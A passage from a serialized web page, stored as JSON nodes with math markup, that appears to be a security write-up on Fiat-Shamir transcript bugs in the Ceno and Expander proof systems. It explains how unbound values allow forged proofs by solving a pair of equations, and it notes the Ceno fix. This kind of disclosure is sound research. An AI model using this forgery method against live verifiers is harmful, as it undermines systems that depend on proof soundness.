119659],{"type":33,"value":118353},{"type":28,"tag":116,"props":119661,"children":119663},{"className":119662},[21380],[119664],{"type":33,"value":347},{"type":28,"tag":116,"props":119666,"children":119668},{"className":119667},[3680],[119669],{"type":33,"value":353},{"type":28,"tag":116,"props":119671,"children":119673},{"className":119672},[21401],[119674],{"type":33,"value":15074},{"type":28,"tag":116,"props":119676,"children":119678},{"className":119677},[21380],[119679],{"type":33,"value":347},{"type":28,"tag":116,"props":119681,"children":119683},{"className":119682},[3680],[119684],{"type":33,"value":1824},{"type":28,"tag":116,"props":119686,"children":119688},{"className":119687},[21401],[119689],{"type":33,"value":15074},{"type":33,"value":119691}," we get the following constraint:",{"type":28,"tag":29,"props":119693,"children":119694},{},[119695],{"type":28,"tag":98,"props":119696,"children":119698},{"className":119697},[3652,3653],[119699],{"type":28,"tag":116,"props":119700,"children":119702},{"className":119701},[3658],[119703],{"type":28,"tag":116,"props":119704,"children":119706},{"className":119705,"ariaHidden":3664},[3663],[119707,119786,119864,119905],{"type":28,"tag":116,"props":119708,"children":119710},{"className":119709},[3669],[119711,119716,119773,119777,119782],{"type":28,"tag":116,"props":119712,"children":119715},{"className":119713,"style":119714},[3674],"height:0.5945em;vertical-align:-0.15em;",[],{"type":28,"tag":116,"props":119717,"children":119719},{"className":119718},[3680],[119720,119725],{"type":28,"tag":116,"props":119721,"children":119723},{"className":119722},[3680,21251],[119724],{"type":33,"value":18939},{"type":28,"tag":116,"props":119726,"children":119728},{"className":119727},[3695],[119729],{"type":28,"tag":116,"props":119730,"children":119732},{"className":119731},[3700,21305],[119733,119762],{"type":28,"tag":116,"props":119734,"children":119736},{"className":119735},[3705],[119737,119757],{"type":28,"tag":116,"props":119738,"children":119740},{"className":119739,"style":92715},[3710],[119741],{"type":28,"tag":116,"props":119742,"children":119743},{"style":92719},[119744,119748],{"type":28,"tag":116,"props":119745,"children":119747},{"className":119746,"style":3720},[3719],[],{"type":28,"tag":116,"props":119749,"children":119751},{"className":119750},[3725,3726,3727,3728],[119752],{"type":28,"tag":116,"props":119753,"children":119755},{"className":119754},[3680,3728],[119756],{"type":33,"value":353},{"type":28,"tag":116,"props":119758,"children":119760},{"className":119759},[21407],[119761],{"type":33,"value":21410},{"type":28,"tag":116,"props":119763,"children":119765},{"className":119764},[3705],[119766],{"type":28,"tag":116,"props":119767,"children":119769},{"className":119768,"style":92746},[3710],[119770],{"type":28,"tag":116,"props":119771,"children":119772},{},[],{"type":28,"tag":116,"props":119774,"children":119776},{"className":119775,"style":3760},[3759],[],{"type":28,"tag":116,"props":119778,"children":119780},{"className":119779},[3765],[119781],{"type":33,"value":110922},{"type":28,"tag":116,"props":119783,"children":119785},{"className":119784,"style":3760},[3759],[],{"type":28,"tag":116,"props":119787,"children":119789},{"className":119788},[3669],[119790,119794,119851,119855,119860],{"type":28,"tag":116,"props":119791,"children":119793},{"className":119792,"style":119714},[3674],[],{"type":28,"tag":116,"props":119795,"children":119797},{"className":119796},[3680],[119798,119803],{"type":28,"tag":116,"props":119799,"children":119801},{"className":119800},[3680,21251],[119802],{"type":33,"value":18939},{"type":28,"tag":116,"props":119804,"children":119806},{"className":119805},[3695],[119807],{"type":28,"tag":116,"props":119808,"children":119810},{"className":119809},[3700,21305],[119811,119840],{"type":28,"tag":116,"props":119812,"children":119814},{"className":119813},[3705],[119815,119835],{"type":28,"tag":116,"props":119816,"children":119818},{"className":119817,"style":92715},[3710],[119819],{"type":28,"tag":116,"props":119820,"children":119821},{"style":92719},[119822,119826],{"type":28,"tag":116,"props":119823,"children":119825},{"className":119824,"style":3720},[3719],[],{"type":28,"tag":116,"props":119827,"children":119829},{"className":119828},[3725,3726,3727,3728],[119830],{"type":28,"tag":116,"props":119831,"children":119833},{"className":119832},[3680,3728],[119834],{"type":33,"value":1824},{"type":28,"tag":116,"props":119836,"children":119838},{"className":119837},[21407],[119839],{"type":33,"value":21410},{"type":28,"tag":116,"props":119841,"children":119843},{"className":119842},[3705],[119844],{"type":28,"tag":116,"props":119845,"children":119847},{"className":119846,"style":92746},[3710],[119848],{"type":28,"tag":116,"props":119849,"children":119850},{},[],{"type":28,"tag":116,"props":119852,"children":119854},{"className":119853,"style":3760},[3759],[],{"type":28,"tag":116,"props":119856,"children":119858},{"className":119857},[3765],[119859],{"type":33,"value":110922},{"type":28,"tag":116,"props":119861,"children":119863},{"className":119862,"style":3760},[3759],[],{"type":28,"tag":116,"props":119865,"children":119867},{"className":119866},[3669],[119868,119872,119877,119887,119892,119896,119901],{"type":28,"tag":116,"props":119869,"children":119871},{"className":119870,"style":3780},[3674],[],{"type":28,"tag":116,"props":119873,"children":119875},{"className":119874},[21380],[119876],{"type":33,"value":313},{"type":28,"tag":116,"props":119878,"children":119880},{"className":119879},[3680,33],[119881],{"type":28,"tag":116,"props":119882,"children":119884},{"className":119883},[3680],[119885],{"type":33,"value":119886},"rest of product",{"type":28,"tag":116,"props":119888,"children":119890},{"className":119889},[21401],[119891],{"type":33,"value":1829},{"type":28,"tag":116,"props":119893,"children":119895},{"className":119894,"style":3857},[3759],[],{"type":28,"tag":116,"props":119897,"children":119899},{"className":119898},[3862],[119900],{"type":33,"value":373},{"type":28,"tag":116,"props":119902,"children":119904},{"className":119903,"style":3857},[3759],[],{"type":28,"tag":116,"props":119906,"children":119908},{"className":119907},[3669],[119909,119913],{"type":28,"tag":116,"props":119910,"children":119912},{"className":119911,"style":114680},[3674],[],{"type":28,"tag":116,"props":119914,"children":119916},{"className":119915},[3680,33],[119917],{"type":28,"tag":116,"props":119918,"children":119920},{"className":119919},[3680],[119921],{"type":33,"value":114691},{"type":28,"tag":29,"props":119923,"children":119924},{},[119925,119927,120080],{"type":33,"value":119926},"This is bilinear in ",{"type":28,"tag":98,"props":119928,"children":119930},{"className":119929},[3652,3653],[119931],{"type":28,"tag":116,"props":119932,"children":119934},{"className":119933},[3658],[119935],{"type":28,"tag":116,"props":119936,"children":119938},{"className":119937,"ariaHidden":3664},[3663],[119939],{"type":28,"tag":116,"props":119940,"children":119942},{"className":119941},[3669],[119943,119947,119952,120009,120014,120018,120075],{"type":28,"tag":116,"props":119944,"children":119946},{"className":119945,"style":3780},[3674],[],{"type":28,"tag":116,"props":119948,"children":119950},{"className":119949},[21380],[119951],{"type":33,"value":313},{"type":28,"tag":116,"props":119953,"children":119955},{"className":119954},[3680],[119956,119961],{"type":28,"tag":116,"props":119957,"children":119959},{"className":119958},[3680,21251],[119960],{"type":33,"value":18939},{"type":28,"tag":116,"props":119962,"children":119964},{"className":119963},[3695],[119965],{"type":28,"tag":116,"props":119966,"children":119968},{"className":119967},[3700,21305],[119969,119998],{"type":28,"tag":116,"props":119970,"children":119972},{"className":119971},[3705],[119973,119993],{"type":28,"tag":116,"props":119974,"children":119976},{"className":119975,"style":92715},[3710],[119977],{"type":28,"tag":116,"props":119978,"children":119979},{"style":92719},[119980,119984],{"type":28,"tag":116,"props":119981,"children":119983},{"className":119982,"style":3720},[3719],[],{"type":28,"tag":116,"props":119985,"children":119987},{"className":119986},[3725,3726,3727,3728],[119988],{"type":28,"tag":116,"props":119989,"children":119991},{"className":119990},[3680,3728],[119992],{"type":33,"value":353},{"type":28,"tag":116,"props":119994,"children":119996},{"className":119995},[21407],[119997],{"type":33,"value":21410},{"type":28,"tag":116,"props":119999,"children":120001},{"className":120000},[3705],[120002],{"type":28,"tag":116,"props":120003,"children":120005},{"className":120004,"style":92746},[3710],[120006],{"type":28,"tag":116,"props":120007,"children":120008},{},[],{"type":28,"tag":116,"props":120010,"children":120012},{"className":120011},[3791],[120013],{"type":33,"value":3794},{"type":28,"tag":116,"props":120015,"children":120017},{"className":120016,"style":3798},[3759],[],{"type":28,"tag":116,"props":120019,"children":120021},{"className":120020},[3680],[120022,120027],{"type":28,"tag":116,"props":120023,"children":120025},{"className":120024},[3680,21251],[120026],{"type":33,"value":18939},{"type":28,"tag":116,"props":120028,"children":120030},{"className":120029},[3695],[120031],{"type":28,"tag":116,"props":120032,"children":120034},{"className":120033},[3700,21305],[120035,120064],{"type":28,"tag":116,"props":120036,"children":120038},{"className":120037},[3705],[120039,120059],{"type":28,"tag":116,"props":120040,"children":120042},{"className":120041,"style":92715},[3710],[120043],{"type":28,"tag":116,"props":120044,"children":120045},{"style":92719},[120046,120050],{"type":28,"tag":116,"props":120047,"children":120049},{"className":120048,"style":3720},[3719],[],{"type":28,"tag":116,"props":120051,"children":120053},{"className":120052},[3725,3726,3727,3728],[120054],{"type":28,"tag":116,"props":120055,"children":120057},{"className":120056},[3680,3728],[120058],{"type":33,"value":1824},{"type":28,"tag":116,"props":120060,"children":120062},{"className":120061},[21407],[120063],{"type":33,"value":21410},{"type":28,"tag":116,"props":120065,"children":120067},{"className":120066},[3705],[120068],{"type":28,"tag":116,"props":120069,"children":120071},{"className":120070,"style":92746},[3710],[120072],{"type":28,"tag":116,"props":120073,"children":120074},{},[],{"type":28,"tag":116,"props":120076,"children":120078},{"className":120077},[21401],[120079],{"type":33,"value":1829},{"type":33,"value":141},{"type":28,"tag":29,"props":120082,"children":120083},{},[120084,120086,120239],{"type":33,"value":120085},"We have two unknowns ",{"type":28,"tag":98,"props":120087,"children":120089},{"className":120088},[3652,3653],[120090],{"type":28,"tag":116,"props":120091,"children":120093},{"className":120092},[3658],[120094],{"type":28,"tag":116,"props":120095,"children":120097},{"className":120096,"ariaHidden":3664},[3663],[120098],{"type":28,"tag":116,"props":120099,"children":120101},{"className":120100},[3669],[120102,120106,120111,120168,120173,120177,120234],{"type":28,"tag":116,"props":120103,"children":120105},{"className":120104,"style":3780},[3674],[],{"type":28,"tag":116,"props":120107,"children":120109},{"className":120108},[21380],[120110],{"type":33,"value":313},{"type":28,"tag":116,"props":120112,"children":120114},{"className":120113},[3680],[120115,120120],{"type":28,"tag":116,"props":120116,"children":120118},{"className":120117},[3680,21251],[120119],{"type":33,"value":18939},{"type":28,"tag":116,"props":120121,"children":120123},{"className":120122},[3695],[120124],{"type":28,"tag":116,"props":120125,"children":120127},{"className":120126},[3700,21305],[120128,120157],{"type":28,"tag":116,"props":120129,"children":120131},{"className":120130},[3705],[120132,120152],{"type":28,"tag":116,"props":120133,"children":120135},{"className":120134,"style":92715},[3710],[120136],{"type":28,"tag":116,"props":120137,"children":120138},{"style":92719},[120139,120143],{"type":28,"tag":116,"props":120140,"children":120142},{"className":120141,"style":3720},[3719],[],{"type":28,"tag":116,"props":120144,"children":120146},{"className":120145},[3725,3726,3727,3728],[120147],{"type":28,"tag":116,"props":120148,"children":120150},{"className":120149},[3680,3728],[120151],{"type":33,"value":353},{"type":28,"tag":116,"props":120153,"children":120155},{"className":120154},[21407],[120156],{"type":33,"value":21410},{"type":28,"tag":116,"props":120158,"children":120160},{"className":120159},[3705],[120161],{"type":28,"tag":116,"props":120162,"children":120164},{"className":120163,"style":92746},[3710],[120165],{"type":28,"tag":116,"props":120166,"children":120167},{},[],{"type":28,"tag":116,"props":120169,"children":120171},{"className":120170},[3791],[120172],{"type":33,"value":3794},{"type":28,"tag":116,"props":120174,"children":120176},{"className":120175,"style":3798},[3759],[],{"type":28,"tag":116,"props":120178,"children":120180},{"className":120179},[3680],[120181,120186],{"type":28,"tag":116,"props":120182,"children":120184},{"className":120183},[3680,21251],[120185],{"type":33,"value":18939},{"type":28,"tag":116,"props":120187,"children":120189},{"className":120188},[3695],[120190],{"type":28,"tag":116,"props":120191,"children":120193},{"className":120192},[3700,21305],[120194,120223],{"type":28,"tag":116,"props":120195,"children":120197},{"className":120196},[3705],[120198,120218],{"type":28,"tag":116,"props":120199,"children":120201},{"className":120200,"style":92715},[3710],[120202],{"type":28,"tag":116,"props":120203,"children":120204},{"style":92719},[120205,120209],{"type":28,"tag":116,"props":120206,"children":120208},{"className":120207,"style":3720},[3719],[],{"type":28,"tag":116,"props":120210,"children":120212},{"className":120211},[3725,3726,3727,3728],[120213],{"type":28,"tag":116,"props":120214,"children":120216},{"className":120215},[3680,3728],[120217],{"type":33,"value":1824},{"type":28,"tag":116,"props":120219,"children":120221},{"className":120220},[21407],[120222],{"type":33,"value":21410},{"type":28,"tag":116,"props":120224,"children":120226},{"className":120225},[3705],[120227],{"type":28,"tag":116,"props":120228,"children":120230},{"className":120229,"style":92746},[3710],[120231],{"type":28,"tag":116,"props":120232,"children":120233},{},[],{"type":28,"tag":116,"props":120235,"children":120237},{"className":120236},[21401],[120238],{"type":33,"value":1829},{"type":33,"value":120240}," and two equations, one linear and one bilinear:",{"type":28,"tag":455,"props":120242,"children":120243},{},[120244,120571],{"type":28,"tag":459,"props":120245,"children":120246},{},[120247,120249],{"type":33,"value":120248},"Linear (from GKR): ",{"type":28,"tag":98,"props":120250,"children":120252},{"className":120251},[3652,3653],[120253],{"type":28,"tag":116,"props":120254,"children":120256},{"className":120255},[3658],[120257],{"type":28,"tag":116,"props":120258,"children":120260},{"className":120259,"ariaHidden":3664},[3663],[120261,120397,120532,120558],{"type":28,"tag":116,"props":120262,"children":120264},{"className":120263},[3669],[120265,120270,120327,120384,120388,120393],{"type":28,"tag":116,"props":120266,"children":120269},{"className":120267,"style":120268},[3674],"height:0.7333em;vertical-align:-0.15em;",[],{"type":28,"tag":116,"props":120271,"children":120273},{"className":120272},[3680],[120274,120279],{"type":28,"tag":116,"props":120275,"children":120277},{"className":120276},[3680,21251],[120278],{"type":33,"value":87},{"type":28,"tag":116,"props":120280,"children":120282},{"className":120281},[3695],[120283],{"type":28,"tag":116,"props":120284,"children":120286},{"className":120285},[3700,21305],[120287,120316],{"type":28,"tag":116,"props":120288,"children":120290},{"className":120289},[3705],[120291,120311],{"type":28,"tag":116,"props":120292,"children":120294},{"className":120293,"style":92715},[3710],[120295],{"type":28,"tag":116,"props":120296,"children":120297},{"style":92719},[120298,120302],{"type":28,"tag":116,"props":120299,"children":120301},{"className":120300,"style":3720},[3719],[],{"type":28,"tag":116,"props":120303,"children":120305},{"className":120304},[3725,3726,3727,3728],[120306],{"type":28,"tag":116,"props":120307,"children":120309},{"className":120308},[3680,3728],[120310],{"type":33,"value":353},{"type":28,"tag":116,"props":120312,"children":120314},{"className":120313},[21407],[120315],{"type":33,"value":21410},{"type":28,"tag":116,"props":120317,"children":120319},{"className":120318},[3705],[120320],{"type":28,"tag":116,"props":120321,"children":120323},{"className":120322,"style":92746},[3710],[120324],{"type":28,"tag":116,"props":120325,"children":120326},{},[],{"type":28,"tag":116,"props":120328,"children":120330},{"className":120329},[3680],[120331,120336],{"type":28,"tag":116,"props":120332,"children":120334},{"className":120333},[3680,21251],[120335],{"type":33,"value":18939},{"type":28,"tag":116,"props":120337,"children":120339},{"className":120338},[3695],[120340],{"type":28,"tag":116,"props":120341,"children":120343},{"className":120342},[3700,21305],[120344,120373],{"type":28,"tag":116,"props":120345,"children":120347},{"className":120346},[3705],[120348,120368],{"type":28,"tag":116,"props":120349,"children":120351},{"className":120350,"style":92715},[3710],[120352],{"type":28,"tag":116,"props":120353,"children":120354},{"style":92719},[120355,120359],{"type":28,"tag":116,"props":120356,"children":120358},{"className":120357,"style":3720},[3719],[],{"type":28,"tag":116,"props":120360,"children":120362},{"className":120361},[3725,3726,3727,3728],[120363],{"type":28,"tag":116,"props":120364,"children":120366},{"className":120365},[3680,3728],[120367],{"type":33,"value":353},{"type":28,"tag":116,"props":120369,"children":120371},{"className":120370},[21407],[120372],{"type":33,"value":21410},{"type":28,"tag":116,"props":120374,"children":120376},{"className":120375},[3705],[120377],{"type":28,"tag":116,"props":120378,"children":120380},{"className":120379,"style":92746},[3710],[120381],{"type":28,"tag":116,"props":120382,"children":120383},{},[],{"type":28,"tag":116,"props":120385,"children":120387},{"className":120386,"style":3760},[3759],[],{"type":28,"tag":116,"props":120389,"children":120391},{"className":120390},[3765],[120392],{"type":33,"value":2268},{"type":28,"tag":116,"props":120394,"children":120396},{"className":120395,"style":3760},[3759],[],{"type":28,"tag":116,"props":120398,"children":120400},{"className":120399},[3669],[120401,120405,120462,120519,120523,120528],{"type":28,"tag":116,"props":120402,"children":120404},{"className":120403,"style":120268},[3674],[],{"type":28,"tag":116,"props":120406,"children":120408},{"className":120407},[3680],[120409,120414],{"type":28,"tag":116,"props":120410,"children":120412},{"className":120411},[3680,21251],[120413],{"type":33,"value":87},{"type":28,"tag":116,"props":120415,"children":120417},{"className":120416},[3695],[120418],{"type":28,"tag":116,"props":120419,"children":120421},{"className":120420},[3700,21305],[120422,120451],{"type":28,"tag":116,"props":120423,"children":120425},{"className":120424},[3705],[120426,120446],{"type":28,"tag":116,"props":120427,"children":120429},{"className":120428,"style":92715},[3710],[120430],{"type":28,"tag":116,"props":120431,"children":120432},{"style":92719},[120433,120437],{"type":28,"tag":116,"props":120434,"children":120436},{"className":120435,"style":3720},[3719],[],{"type":28,"tag":116,"props":120438,"children":120440},{"className":120439},[3725,3726,3727,3728],[120441],{"type":28,"tag":116,"props":120442,"children":120444},{"className":120443},[3680,3728],[120445],{"type":33,"value":1824},{"type":28,"tag":116,"props":120447,"children":120449},{"className":120448},[21407],[120450],{"type":33,"value":21410},{"type":28,"tag":116,"props":120452,"children":120454},{"className":120453},[3705],[120455],{"type":28,"tag":116,"props":120456,"children":120458},{"className":120457,"style":92746},[3710],[120459],{"type":28,"tag":116,"props":120460,"children":120461},{},[],{"type":28,"tag":116,"props":120463,"children":120465},{"className":120464},[3680],[120466,120471],{"type":28,"tag":116,"props":120467,"children":120469},{"className":120468},[3680,21251],[120470],{"type":33,"value":18939},{"type":28,"tag":116,"props":120472,"children":120474},{"className":120473},[3695],[120475],{"type":28,"tag":116,"props":120476,"children":120478},{"className":120477},[3700,21305],[120479,120508],{"type":28,"tag":116,"props":120480,"children":120482},{"className":120481},[3705],[120483,120503],{"type":28,"tag":116,"props":120484,"children":120486},{"className":120485,"style":92715},[3710],[120487],{"type":28,"tag":116,"props":120488,"children":120489},{"style":92719},[120490,120494],{"type":28,"tag":116,"props":120491,"children":120493},{"className":120492,"style":3720},[3719],[],{"type":28,"tag":116,"props":120495,"children":120497},{"className":120496},[3725,3726,3727,3728],[120498],{"type":28,"tag":116,"props":120499,"children":120501},{"className":120500},[3680,3728],[120502],{"type":33,"value":1824},{"type":28,"tag":116,"props":120504,"children":120506},{"className":120505},[21407],[120507],{"type":33,"value":21410},{"type":28,"tag":116,"props":120509,"children":120511},{"className":120510},[3705],[120512],{"type":28,"tag":116,"props":120513,"children":120515},{"className":120514,"style":92746},[3710],[120516],{"type":28,"tag":116,"props":120517,"children":120518},{},[],{"type":28,"tag":116,"props":120520,"children":120522},{"className":120521,"style":3760},[3759],[],{"type":28,"tag":116,"props":120524,"children":120526},{"className":120525},[3765],[120527],{"type":33,"value":2268},{"type":28,"tag":116,"props":120529,"children":120531},{"className":120530,"style":3760},[3759],[],{"type":28,"tag":116,"props":120533,"children":120535},{"className":120534},[3669],[120536,120540,120545,120549,120554],{"type":28,"tag":116,"props":120537,"children":120539},{"className":120538,"style":110501},[3674],[],{"type":28,"tag":116,"props":120541,"children":120543},{"className":120542},[3680,21251],[120544],{"type":33,"value":1797},{"type":28,"tag":116,"props":120546,"children":120548},{"className":120547,"style":3857},[3759],[],{"type":28,"tag":116,"props":120550,"children":120552},{"className":120551},[3862],[120553],{"type":33,"value":373},{"type":28,"tag":116,"props":120555,"children":120557},{"className":120556,"style":3857},[3759],[],{"type":28,"tag":116,"props":120559,"children":120561},{"className":120560},[3669],[120562,120566],{"type":28,"tag":116,"props":120563,"children":120565},{"className":120564,"style":93694},[3674],[],{"type":28,"tag":116,"props":120567,"children":120569},{"className":120568},[3680],[120570],{"type":33,"value":353},{"type":28,"tag":459,"props":120572,"children":120573},{},[120574,120576],{"type":33,"value":120575},"Bilinear (from multiset): ",{"type":28,"tag":98,"props":120577,"children":120579},{"className":120578},[3652,3653],[120580],{"type":28,"tag":116,"props":120581,"children":120583},{"className":120582},[3658],[120584],{"type":28,"tag":116,"props":120585,"children":120587},{"className":120586,"ariaHidden":3664},[3663],[120588,120614,120692,120770,120796],{"type":28,"tag":116,"props":120589,"children":120591},{"className":120590},[3669],[120592,120596,120601,120605,120610],{"type":28,"tag":116,"props":120593,"children":120595},{"className":120594,"style":92578},[3674],[],{"type":28,"tag":116,"props":120597,"children":120599},{"className":120598,"style":94092},[3680,21251],[120600],{"type":33,"value":88302},{"type":28,"tag":116,"props":120602,"children":120604},{"className":120603,"style":3760},[3759],[],{"type":28,"tag":116,"props":120606,"children":120608},{"className":120607},[3765],[120609],{"type":33,"value":110922},{"type":28,"tag":116,"props":120611,"children":120613},{"className":120612,"style":3760},[3759],[],{"type":28,"tag":116,"props":120615,"children":120617},{"className":120616},[3669],[120618,120622,120679,120683,120688],{"type":28,"tag":116,"props":120619,"children":120621},{"className":120620,"style":119714},[3674],[],{"type":28,"tag":116,"props":120623,"children":120625},{"className":120624},[3680],[120626,120631],{"type":28,"tag":116,"props":120627,"children":120629},{"className":120628},[3680,21251],[120630],{"type":33,"value":18939},{"type":28,"tag":116,"props":120632,"children":120634},{"className":120633},[3695],[120635],{"type":28,"tag":116,"props":120636,"children":120638},{"className":120637},[3700,21305],[120639,120668],{"type":28,"tag":116,"props":120640,"children":120642},{"className":120641},[3705],[120643,120663],{"type":28,"tag":116,"props":120644,"children":120646},{"className":120645,"style":92715},[3710],[120647],{"type":28,"tag":116,"props":120648,"children":120649},{"style":92719},[120650,120654],{"type":28,"tag":116,"props":120651,"children":120653},{"className":120652,"style":3720},[3719],[],{"type":28,"tag":116,"props":120655,"children":120657},{"className":120656},[3725,3726,3727,3728],[120658],{"type":28,"tag":116,"props":120659,"children":120661},{"className":120660},[3680,3728],[120662],{"type":33,"value":353},{"type":28,"tag":116,"props":120664,"children":120666},{"className":120665},[21407],[120667],{"type":33,"value":21410},{"type":28,"tag":116,"props":120669,"children":120671},{"className":120670},[3705],[120672],{"type":28,"tag":116,"props":120673,"children":120675},{"className":120674,"style":92746},[3710],[120676],{"type":28,"tag":116,"props":120677,"children":120678},{},[],{"type":28,"tag":116,"props":120680,"children":120682},{"className":120681,"style":3760},[3759],[],{"type":28,"tag":116,"props":120684,"children":120686},{"className":120685},[3765],[120687],{"type":33,"value":110922},{"type":28,"tag":116,"props":120689,"children":120691},{"className":120690,"style":3760},[3759],[],{"type":28,"tag":116,"props":120693,"children":120695},{"className":120694},[3669],[120696,120700,120757,120761,120766],{"type":28,"tag":116,"props":120697,"children":120699},{"className":120698,"style":120268},[3674],[],{"type":28,"tag":116,"props":120701,"children":120703},{"className":120702},[3680],[120704,120709],{"type":28,"tag":116,"props":120705,"children":120707},{"className":120706},[3680,21251],[120708],{"type":33,"value":18939},{"type":28,"tag":116,"props":120710,"children":120712},{"className":120711},[3695],[120713],{"type":28,"tag":116,"props":120714,"children":120716},{"className":120715},[3700,21305],[120717,120746],{"type":28,"tag":116,"props":120718,"children":120720},{"className":120719},[3705],[120721,120741],{"type":28,"tag":116,"props":120722,"children":120724},{"className":120723,"style":92715},[3710],[120725],{"type":28,"tag":116,"props":120726,"children":120727},{"style":92719},[120728,120732],{"type":28,"tag":116,"props":120729,"children":120731},{"className":120730,"style":3720},[3719],[],{"type":28,"tag":116,"props":120733,"children":120735},{"className":120734},[3725,3726,3727,3728],[120736],{"type":28,"tag":116,"props":120737,"children":120739},{"className":120738},[3680,3728],[120740],{"type":33,"value":1824},{"type":28,"tag":116,"props":120742,"children":120744},{"className":120743},[21407],[120745],{"type":33,"value":21410},{"type":28,"tag":116,"props":120747,"children":120749},{"className":120748},[3705],[120750],{"type":28,"tag":116,"props":120751,"children":120753},{"className":120752,"style":92746},[3710],[120754],{"type":28,"tag":116,"props":120755,"children":120756},{},[],{"type":28,"tag":116,"props":120758,"children":120760},{"className":120759,"style":3760},[3759],[],{"type":28,"tag":116,"props":120762,"children":120764},{"className":120763},[3765],[120765],{"type":33,"value":2268},{"type":28,"tag":116,"props":120767,"children":120769},{"className":120768,"style":3760},[3759],[],{"type":28,"tag":116,"props":120771,"children":120773},{"className":120772},[3669],[120774,120778,120783,120787,120792],{"type":28,"tag":116,"props":120775,"children":120777},{"className":120776,"style":92578},[3674],[],{"type":28,"tag":116,"props":120779,"children":120781},{"className":120780},[3680,21251],[120782],{"type":33,"value":70183},{"type":28,"tag":116,"props":120784,"children":120786},{"className":120785,"style":3857},[3759],[],{"type":28,"tag":116,"props":120788,"children":120790},{"className":120789},[3862],[120791],{"type":33,"value":373},{"type":28,"tag":116,"props":120793,"children":120795},{"className":120794,"style":3857},[3759],[],{"type":28,"tag":116,"props":120797,"children":120799},{"className":120798},[3669],[120800,120804],{"type":28,"tag":116,"props":120801,"children":120803},{"className":120802,"style":93694},[3674],[],{"type":28,"tag":116,"props":120805,"children":120807},{"className":120806},[3680],[120808],{"type":33,"value":353},{"type":28,"tag":29,"props":120810,"children":120811},{},[120812],{"type":33,"value":120813},"Substitution reduces this to a quadratic in one variable, which is solvable with the quadratic formula.",{"type":28,"tag":29,"props":120815,"children":120816},{},[120817,120821,120823,120830,120832,120839],{"type":28,"tag":4995,"props":120818,"children":120819},{},[120820],{"type":33,"value":116370},{"type":33,"value":120822}," Fixed on March 5, 2026 via ",{"type":28,"tag":87,"props":120824,"children":120827},{"href":120825,"rel":120826},"https://github.com/scroll-tech/ceno/pull/1262",[91],[120828],{"type":33,"value":120829},"PR #1262",{"type":33,"value":120831}," (original report: ",{"type":28,"tag":87,"props":120833,"children":120836},{"href":120834,"rel":120835},"https://github.com/scroll-tech/ceno/issues/1125",[91],[120837],{"type":33,"value":120838},"#1125",{"type":33,"value":1829},{"type":28,"tag":18457,"props":120841,"children":120842},{},[],{"type":28,"tag":75,"props":120844,"children":120846},{"id":120845},"expander-polyhedra",[120847],{"type":33,"value":120848},"Expander (Polyhedra)",{"type":28,"tag":29,"props":120850,"children":120851},{},[120852],{"type":33,"value":120853},"Expander is a GKR-based proof system for arithmetic circuits.",{"type":28,"tag":29,"props":120855,"children":120856},{},[120857],{"type":28,"tag":4995,"props":120858,"children":120859},{},[120860],{"type":33,"value":115076},{"type":28,"tag":234,"props":120862,"children":120864},{"code":120863},"Proof (raw bytes, parsed in order):\n    - PCS commitment\n    - Sumcheck round polynomials (for each layer)\n    - Layer claims (claim_x, claim_y)\n    - PCS opening proofs\n\nNOT in proof bytes (passed separately):\n    - public_input    // statement data passed separately\n    - claimed_v       // statement claim passed separately\n",[120865],{"type":28,"tag":98,"props":120866,"children":120867},{"__ignoreMap":7},[120868],{"type":33,"value":120863},{"type":28,"tag":29,"props":120870,"children":120871},{},[120872,120874,120880],{"type":33,"value":120873},"In Expander's circuit model, constant gates can reference public input values. During GKR verification, the ",{"type":28,"tag":98,"props":120875,"children":120877},{"className":120876},[],[120878],{"type":33,"value":120879},"eval_cst",{"type":33,"value":120881}," evaluates the contribution of these gates at the sumcheck challenge point:",{"type":28,"tag":234,"props":120883,"children":120885},{"code":120884,"language":2651,"meta":7,"className":2652,"style":7},"sum -= GKRVerifierHelper::eval_cst(&layer.const_, public_input, sp);\n",[120886],{"type":28,"tag":98,"props":120887,"children":120888},{"__ignoreMap":7},[120889],{"type":28,"tag":116,"props":120890,"children":120891},{"class":245,"line":246},[120892,120896,120901,120906,120910,120914,120918,120922,120927,120931,120936,120941,120945,120950],{"type":28,"tag":116,"props":120893,"children":120894},{"style":272},[120895],{"type":33,"value":76252},{"type":28,"tag":116,"props":120897,"children":120898},{"style":370},[120899],{"type":33,"value":120900}," -=",{"type":28,"tag":116,"props":120902,"children":120903},{"style":339},[120904],{"type":33,"value":120905}," GKRVerifierHelper",{"type":28,"tag":116,"props":120907,"children":120908},{"style":370},[120909],{"type":33,"value":3151},{"type":28,"tag":116,"props":120911,"children":120912},{"style":282},[120913],{"type":33,"value":120879},{"type":28,"tag":116,"props":120915,"children":120916},{"style":266},[120917],{"type":33,"value":313},{"type":28,"tag":116,"props":120919,"children":120920},{"style":370},[120921],{"type":33,"value":2780},{"type":28,"tag":116,"props":120923,"children":120924},{"style":272},[120925],{"type":33,"value":120926},"layer",{"type":28,"tag":116,"props":120928,"children":120929},{"style":370},[120930],{"type":33,"value":141},{"type":28,"tag":116,"props":120932,"children":120933},{"style":266},[120934],{"type":33,"value":120935},"const_, ",{"type":28,"tag":116,"props":120937,"children":120938},{"style":272},[120939],{"type":33,"value":120940},"public_input",{"type":28,"tag":116,"props":120942,"children":120943},{"style":266},[120944],{"type":33,"value":825},{"type":28,"tag":116,"props":120946,"children":120947},{"style":272},[120948],{"type":33,"value":120949},"sp",{"type":28,"tag":116,"props":120951,"children":120952},{"style":266},[120953],{"type":33,"value":895},{"type":28,"tag":29,"props":120955,"children":120956},{},[120957,120959,120964],{"type":33,"value":120958},"This evaluation is a linear combination of public input values, weighted by coefficients derived from the challenges stored in the verifier's scratch pad (",{"type":28,"tag":98,"props":120960,"children":120962},{"className":120961},[],[120963],{"type":33,"value":120949},{"type":33,"value":1484},{"type":28,"tag":29,"props":120966,"children":120967},{},[120968],{"type":28,"tag":4995,"props":120969,"children":120970},{},[120971],{"type":33,"value":120972},"The vulnerability:",{"type":28,"tag":29,"props":120974,"children":120975},{},[120976,120981],{"type":28,"tag":98,"props":120977,"children":120979},{"className":120978},[],[120980],{"type":33,"value":120940},{"type":33,"value":120982}," is never absorbed into the transcript. The transcript is initialized from the PCS commitment and sumcheck round messages, but public inputs are passed separately to the 